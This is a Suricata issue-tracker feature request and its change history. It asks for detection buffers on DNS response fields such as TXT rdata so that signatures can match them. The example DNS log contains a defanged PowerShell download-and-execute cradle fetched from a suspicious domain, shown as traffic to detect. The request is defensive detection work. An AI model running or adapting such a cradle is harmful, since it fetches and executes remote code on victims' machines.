Project

General

Profile

Actions

Feature #2448

open

Add additional buffers for DNS Responses

Added by Jack Mott almost 7 years ago. Updated over 1 year ago.

Status:
New
Priority:
Normal
Assignee:
Target version:
Effort:
Difficulty:
Label:
Beginner, Protocol

Description

Hi,

It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.

I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.

{  
   "timestamp":"2018-02-14T19:12:58.760866-0700",
   "flow_id":345727363089610,
   "pcap_cnt":4,
   "event_type":"dns",
   "src_ip":"8.8.8.8",
   "src_port":53,
   "dest_ip":"192.168.0.105",
   "dest_port":49153,
   "proto":"UDP",
   "dns":{  
      "type":"answer",
      "id":2,
      "rcode":"NOERROR",
      "rrname":"shinobotps1[.]com",
      "rrtype":"TXT",
      "ttl":3600,
      "rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');" 
   }
}

Thanks!


Related issues 4 (4 open0 closed)

Related to Suricata - Feature #2198: Extend the DNS parser to accept dns_response keyword in signaturesNewCommunity TicketActions
Related to Suricata - Task #4097: Suricon 2020 brainstormAssignedVictor JulienActions
Related to Suricata - Feature #7012: Add dns.response sticky bufferIn ReviewNathan ScrivensActions
Related to Suricata - Feature #5642: DNS: parity between log fields and detectionAssignedJason IshActions
Actions #1

Updated by Jason Ish almost 7 years ago

  • Related to Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures added
Actions #2

Updated by Andreas Herz almost 7 years ago

  • Assignee set to OISF Dev
  • Target version set to TBD
Actions #3

Updated by Victor Julien about 5 years ago

  • Target version changed from TBD to 6.0.0beta1
Actions #4

Updated by Victor Julien about 5 years ago

  • Label Beginner added
Actions #5

Updated by Victor Julien almost 5 years ago

  • Label Protocol added
Actions #6

Updated by Victor Julien over 4 years ago

  • Target version changed from 6.0.0beta1 to 7.0.0-beta1
Actions #7

Updated by Jason Ish about 4 years ago

  • Related to Task #4097: Suricon 2020 brainstorm added
Actions #8

Updated by Jason Ish about 4 years ago

As discussed today in the 2020 brainstorm this is still a desired feature. It should be more or less trivial, but could serve as an example of unifying eve logged buffers, and buffers available for detection. At the very least, the rdata buffer should be exposed a sticky for content matches.

Actions #9

Updated by Victor Julien over 3 years ago

  • Target version changed from 7.0.0-beta1 to 8.0.0-beta1
Actions #10

Updated by Brandon Murphy over 1 year ago

It would be nice to have all dns flags parsed as well

perhaps like a dns.flags.z, dns.flags.replycode, etc

doing so would avoid the use of byte_test which are often difficult to read for users attempted to understand the logic in a rule.

Actions #11

Updated by Jason Ish 6 months ago

Actions #12

Updated by Jason Ish 6 months ago

  • Related to Feature #5642: DNS: parity between log fields and detection added
Actions

Also available in: Atom PDF